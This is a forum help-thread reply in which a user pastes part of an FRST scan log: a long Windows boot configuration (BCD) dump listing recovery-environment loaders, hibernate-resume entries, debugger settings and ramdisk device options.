path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{4e494be7-a82c-11e4-9f21-bbcb7c4ae7c6}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {56d2cfbe-ffa5-11e4-9d76-8f895f96bdb5}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{56d2cfbf-ffa5-11e4-9d76-8f895f96bdb5}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-GB
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{56d2cfbf-ffa5-11e4-9d76-8f895f96bdb5}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {5ed48d06-3e9d-11e6-b4ce-890e583dd6aa}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{5ed48d07-3e9d-11e6-b4ce-890e583dd6aa}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{5ed48d07-3e9d-11e6-b4ce-890e583dd6aa}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {67a5f5d2-a4f2-11e4-a74f-990c0320d25c}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{67a5f5d3-a4f2-11e4-a74f-990c0320d25c}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{67a5f5d3-a4f2-11e4-a74f-990c0320d25c}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {6f394632-062c-11e5-9e46-c70a78578c1e}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{6f394633-062c-11e5-9e46-c70a78578c1e}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-GB
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{6f394633-062c-11e5-9e46-c70a78578c1e}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {74b63f52-352e-11e6-9274-dba575b7dfbb}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{74b63f53-352e-11e6-9274-dba575b7dfbb}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{74b63f53-352e-11e6-9274-dba575b7dfbb}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {84377094-c7f6-11e6-8d9d-9dd2077c58d7}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{84377095-c7f6-11e6-8d9d-9dd2077c58d7}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{84377095-c7f6-11e6-8d9d-9dd2077c58d7}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {89f532e4-5ef3-11e4-a253-a762ade906b2}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{89f532e5-5ef3-11e4-a253-a762ade906b2}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{89f532e5-5ef3-11e4-a253-a762ade906b2}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {90d1b72e-2104-11e5-9fe8-96955d914c1a}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{90d1b72f-2104-11e5-9fe8-96955d914c1a}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{90d1b72f-2104-11e5-9fe8-96955d914c1a}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {90ec7a02-ad1f-11e6-a6b2-cd1b6bd63995}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{90ec7a03-ad1f-11e6-a6b2-cd1b6bd63995}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{90ec7a03-ad1f-11e6-a6b2-cd1b6bd63995}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {aba9da96-2c6f-11e5-9b7e-99b7c27ee180}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{aba9da97-2c6f-11e5-9b7e-99b7c27ee180}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{aba9da97-2c6f-11e5-9b7e-99b7c27ee180}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {bd8e81a8-5115-11e6-b299-cac8d5d6ee70}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{bd8e81a9-5115-11e6-b299-cac8d5d6ee70}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{bd8e81a9-5115-11e6-b299-cac8d5d6ee70}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {bdae523f-d33f-11e4-b541-bf24e1a268f6}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{bdae5240-d33f-11e4-b541-bf24e1a268f6}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{bdae5240-d33f-11e4-b541-bf24e1a268f6}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {c0563398-74d7-11e4-ab1c-9cb198ec84d4}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{c0563399-74d7-11e4-ab1c-9cb198ec84d4}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{c0563399-74d7-11e4-ab1c-9cb198ec84d4}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {ca4e4463-2050-11e6-848b-b0cf0c155543}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{ca4e4464-2050-11e6-848b-b0cf0c155543}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{ca4e4464-2050-11e6-848b-b0cf0c155543}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {eed8252a-1c62-11e5-9523-b09403b1f74a}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{eed8252b-1c62-11e5-9523-b09403b1f74a}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{eed8252b-1c62-11e5-9523-b09403b1f74a}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Windows Boot Loader
-------------------
identifier              {fa4c8e4c-778e-11e5-bd80-df3b4abbd218}
device                  ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{fa4c8e4d-778e-11e5-bd80-df3b4abbd218}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
locale                  en-US
inherit                 {bootloadersettings}
displaymessage          Recovery
displaymessageoverride  Recovery
osdevice                ramdisk=[C:]\Recovery\WindowsRE\Winre.wim,{fa4c8e4d-778e-11e5-bd80-df3b4abbd218}
systemroot              \windows
nx                      OptIn
bootmenupolicy          Standard
winpe                   Yes

Resume from Hibernate
---------------------
identifier              {04313033-352e-11e6-9274-dba575b7dfbb}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {74b63f52-352e-11e6-9274-dba575b7dfbb}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {04d461d9-c7f6-11e6-8d9d-9dd2077c58d7}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale          &

Offline Ozzie

  • Full Member
  • ***
  • Posts: 55
    • View Profile
Re: File Type Question
« Reply #34 on: January 25, 2017, 09:00:45 PM »
20th continuation of FRST

Resume from Hibernate
---------------------
identifier              {1f85e35b-ad1f-11e6-a6b2-cd1b6bd63995}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {90ec7a02-ad1f-11e6-a6b2-cd1b6bd63995}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {3aefe89e-a4f1-11e4-a74f-990c0320d25c}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {67a5f5d2-a4f2-11e4-a74f-990c0320d25c}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {405b0c58-5878-11e5-ba10-d3779ebad293}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {1c337f50-5892-11e5-ba10-d3779ebad293}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {45383338-9fbd-11e5-bc98-a742e1ee1e86}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {0a3beb22-9fbe-11e5-bc98-a742e1ee1e86}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {595939b6-2103-11e5-9fe8-96955d914c1a}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {90d1b72e-2104-11e5-9fe8-96955d914c1a}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {5bac4a59-2050-11e6-848b-b0cf0c155543}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {ca4e4463-2050-11e6-848b-b0cf0c155543}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {6ac0f650-f199-11e4-b309-96fcc1ebdff1}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-GB
inherit                 {resumeloadersettings}
recoverysequence        {27b924d8-f19a-11e4-b309-96fcc1ebdff1}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {72d05f34-74d6-11e4-ab1c-9cb198ec84d4}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {c0563398-74d7-11e4-ab1c-9cb198ec84d4}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {74c4be10-3600-11e0-8ff1-0018716eb820}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
filedevice              partition=C:
filepath                \hiberfil.sys
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {8362fcd7-ffa4-11e4-9d76-8f895f96bdb5}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {56d2cfbe-ffa5-11e4-9d76-8f895f96bdb5}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {8b93df4d-3e9c-11e6-b4ce-890e583dd6aa}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {5ed48d06-3e9d-11e6-b4ce-890e583dd6aa}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {9dccde00-5ef1-11e4-a253-a762ade906b2}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {89f532e4-5ef3-11e4-a253-a762ade906b2}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {a1420209-2c6e-11e5-9b7e-99b7c27ee180}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {aba9da96-2c6f-11e5-9b7e-99b7c27ee180}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {a9340868-26f8-11e5-92d8-c964757cb674}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {2af3ba9e-26f9-11e5-92d8-c964757cb674}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {aa5b5bcf-fe02-11e5-a48d-a04756c6d275}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {1817421a-fe03-11e5-a48d-a04756c6d275}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {b2e989df-4ada-11e5-90ec-a1eca10b6741}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {01381978-4adb-11e5-90ec-a1eca10b6741}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {b4fb9e1a-90ea-11e6-9cba-ce2631d934cd}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {362d5e24-90eb-11e6-9cba-ce2631d934cd}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {d0b36eaa-778d-11e5-bd80-df3b4abbd218}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {fa4c8e4c-778e-11e5-bd80-df3b4abbd218}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {d0f0ec58-4ef3-11e6-b864-8e4e49a5f15c}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {46bc2ade-4ef4-11e6-b864-8e4e49a5f15c}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {e86dc95c-5114-11e6-b299-cac8d5d6ee70}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {bd8e81a8-5115-11e6-b299-cac8d5d6ee70}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {eed82528-1c62-11e5-9523-b09403b1f74a}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {eed8252a-1c62-11e5-9523-b09403b1f74a}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {f5c59a7d-5d4d-11e4-b3b5-8fd73e18ab92}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {0bc6c150-5d4e-11e4-b3b5-8fd73e18ab92}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {f732e007-d33e-11e4-b541-bf24e1a268f6}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {bdae523f-d33f-11e4-b541-bf24e1a268f6}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Resume from Hibernate
---------------------
identifier              {ffe3a91b-a82a-11e4-9f21-bbcb7c4ae7c6}
device                  partition=C:
path                    \WINDOWS\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
recoverysequence        {4e494be6-a82c-11e4-9f21-bbcb7c4ae7c6}
recoveryenabled         Yes
allowedinmemorysettings 0x15000075
filedevice              partition=C:
filepath                \hiberfil.sys
bootmenupolicy          Standard
debugoptionenabled      No

Windows Memory Tester
---------------------
identifier              {memdiag}
device                  partition=\Device\HarddiskVolume1
path                    \boot\memtest.exe
description             Windows Memory Diagnostic
locale                  en-US
inherit                 {globalsettings}
badmemoryaccess         Yes

EMS Settings
------------
identifier              {emssettings}
bootems                 No

Debugger Settings
-----------------
identifier              {dbgsettings}
debugtype               Serial
debugport               1
baudrate                115200

RAM Defects
-----------
identifier              {badmemory}

Global Settings
---------------
identifier              {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}

Boot Loader Settings
--------------------
identifier              {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}

Hypervisor Settings
-------------------
identifier              {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200

Resume Loader Settings
----------------------
identifier              {resumeloadersettings}
inherit                 {globalsettings}

Device options
--------------
identifier              {01381979-4adb-11e5-90ec-a1eca10b6741}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {0561ba6b-a4de-11e4-95f8-386077a7a31a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {072c6105-50fa-11e6-baf2-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {07f471a4-3b00-11e1-8ee8-d0df9ade1364}
description             Ramdisk Options
ramdisksdidevice        partition=D:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {0a3beb23-9fbe-11e5-bc98-a742e1ee1e86}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {0bc6c151-5d4e-11e4-b3b5-8fd73e18ab92}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {10e34318-3513-11e6-b390-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {1817421b-fe03-11e5-a48d-a04756c6d275}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {19a2ec41-2c54-11e5-99c3-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {1c337f51-5892-11e5-ba10-d3779ebad293}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {1c75c319-69ca-11e5-9cf9-9ab429923201}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {1f059db4-0e00-11e5-9654-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {2179e136-74c4-11e4-95dd-386077a7a31a}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {27b924d9-f19a-11e4-b309-96fcc1ebdff1}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {2af3ba9f-26f9-11e5-92d8-c964757cb674}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {33cbba83-585d-11e5-b6aa-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {362d5e25-90eb-11e6-9cba-ce2631d934cd}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {39802f99-0e1c-11e5-826f-9d41d4129edd}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {41b1de6c-4ac0-11e5-b6a5-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {46bc2adf-4ef4-11e6-b864-8e4e49a5f15c}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {4e494be7-a82c-11e4-9f21-bbcb7c4ae7c6}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {56d2cfbf-ffa5-11e4-9d76-8f895f96bdb5}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {59bbc8af-0652-11e5-9651-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {5d967430-26de-11e5-b69e-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {5e21caee-5d32-11e4-bba7-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {5ed48d07-3e9d-11e6-b4ce-890e583dd6aa}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {67a5f5d3-a4f2-11e4-a74f-990c0320d25c}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {6f394633-062c-11e5-9e46-c70a78578c1e}
description             Windows Recovery
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {74b63f53-352e-11e6-9274-dba575b7dfbb}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {811b1a47-90ce-11e6-b3b4-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {84377095-c7f6-11e6-8d9d-9dd2077c58d7}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {853e0695-2035-11e6-b38d-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {89f532e5-5ef3-11e4-a253-a762ade906b2}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {90a49c7c-c7e3-11e6-b3bd-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {90d1b72f-2104-11e5-9fe8-96955d914c1a}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {90ec7a03-ad1f-11e6-a6b2-cd1b6bd63995}
description             Windows Recovery
ramdisksdidevice        partition=C:
ramdisksdipath          \Recovery\WindowsRE\boot.sdi

Device options
--------------
identifier              {9f8b0992-69ad-11e5-b6ab-d0df9ade1364}
description             Windows Setup
ramdisksdidevice        partition=C:
ramdisksdipath          \$WINDOWS.~BT\Sources\SafeOS\boot.sdi

Device options
--------------
identifier              {a48c66b7-5ecf-11e4-95d5-386077a7a31a}
description             Windows Setup
